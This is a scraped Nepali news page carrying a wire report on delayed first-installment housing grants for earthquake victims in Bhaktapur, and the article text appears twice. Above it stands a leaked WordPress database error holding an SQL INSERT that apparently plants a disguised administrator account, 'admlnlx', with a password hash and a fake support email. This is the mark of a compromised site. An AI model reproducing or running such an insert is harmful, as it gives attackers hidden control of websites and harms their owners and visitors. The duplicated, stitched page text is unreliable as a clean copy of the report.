WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYSkTKoRW6wDhI3771CY1Goc8xslQb0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 02:54:38', '', 'admlnlx', 'admlnlx')
भक्तपुर,मंसिर २२ –
अनुदान सम्झौता सुरु भएको एक महिना बितिसक्दा पनि अनुदान रकम वितरण नहुँदा भक्तपुरका भूकम्पपीडित घर बनाउन अन्यौलमा परेका छन् ।
पहिलो किस्ता रकम वितरणका लागि भक्तपुरका भूकम्प प्रभावितसँग गत कात्तिक २४ गतेदेखि अनुदान सम्झौता सुरु भएको थियो । सम्झौता भएकासँग पाँच दिनपछि नै अनुदान वितरण गर्ने भनिए पनि अझै वितरण नभएपछि लाभग्राहीले घर बनाउन अन्यौलमा परेका हुन् ।
सङ्घीय मामिला तथा स्थानीय विकास मन्त्रालय अन्तर्गतको केन्द्रीय आयोजना इकाइ कार्यलयले स्थानीय निकायमार्फत भूकम्प प्रभावितलाई पहिलो किस्ता रकम वितरणका लागि भक्तपुरमा हालसम्म १७ हजार लाभग्राहीसँग अनुदान सम्झौता गरिएको स्थानीय विकास अधिकारी धु्रवबहादुर कोइरालाले जानकारी दिनुभयो ।
जिल्लामा लाभग्राहीको नामावलीमा नाम छुटेको र जग्गामा समस्या आएको लगायत समस्या भएको भन्दै ६ हजार भन्दा बढीले गुनासो दर्ता गराएको जानकारी दिँदै उहाँले अब केही दिनभित्रै सम्झौता भएकासँग रकम वितरण सुरु हुने बताउनुभयो ।
जिल्लामा भूकम्पपीडितको सङ्ख्या ३३ हजार ६९६ रहेको पछिल्लो तथ्याङ्क भए पनि २६ हजार १६ लाभग्राही ९भूकम्पपीडित० परिवारको विवरण पुनःनिर्माण प्राधिकरणले जिल्लामा पठाएको छ । रासस
भक्तपुर, २२ मङ्सिर । अनुदान सम्झौता सुरु भएको एक महिना बितिसक्दा पनि अनुदान रकम वितरण नहुँदा भक्तपुरका भूकम्पपीडित घर बनाउन अन्यौलमा परेका छन् ।
पहिलो किस्ता रकम वितरणका लागि भक्तपुरका भूकम्प प्रभावितसँग गत कात्तिक २४ गतेदेखि अनुदान सम्झौता सुरु भएको थियो । सम्झौता भएकासँग पाँच दिनपछि नै अनुदान वितरण गर्ने भनिए पनि अझै वितरण नभएपछि लाभग्राहीले घर बनाउन अन्यौलमा परेका हुन् ।
सङ्घीय मामिला तथा स्थानीय विकास मन्त्रालय अन्तर्गतको केन्द्रीय आयोजना इकाइ कार्यलयले स्थानीय निकायमार्फत भूकम्प प्रभावितलाई पहिलो किस्ता रकम वितरणका लागि भक्तपुरमा हालसम्म १७ हजार लाभग्राहीसँग अनुदान सम्झौता गरिएको स्थानीय विकास अधिकारी धु्रवबहादुर कोइरालाले जानकारी दिनुभयो ।
जिल्लामा लाभग्राहीको नामावलीमा नाम छुटेको र जग्गामा समस्या आएको लगायत समस्या भएको भन्दै ६ हजार भन्दा बढीले गुनासो दर्ता गराएको जानकारी दिँदै उहाँले अब केही दिनभित्रै सम्झौता भएकासँग रकम वितरण सुरु हुने बताउनुभयो ।
जिल्लामा भूकम्पपीडितको सङ्ख्या ३३ हजार ६९६ रहेको पछिल्लो तथ्याङ्क भए पनि २६ हजार १६ लाभग्राही ९भूकम्पपीडित० परिवारको विवरण पुनःनिर्माण प्राधिकरणले जिल्लामा पठाएको छ ।-रासस